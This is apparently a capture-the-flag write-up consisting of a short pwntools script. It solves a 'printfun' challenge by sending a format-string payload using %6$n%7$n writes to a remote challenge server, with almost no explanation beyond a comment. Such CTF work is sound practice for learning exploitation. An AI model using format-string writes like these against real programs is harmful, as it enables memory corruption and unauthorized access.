Tags: format-string printf pwn 

Rating: 0

from pwn import *
from struct import pack

elf = ELF('./printfun')
context.binary = './printfun'

# FORMAT STRING VULNERABILITY!

payload = 'this is mind blowing! %6$n%7$n' # We use Format String exploitation. Google it

# r = elf.process()
r = remote('chal.tuctf.com', 30501)
r.clean()
r.sendline(payload)
r.clean()
r.readline()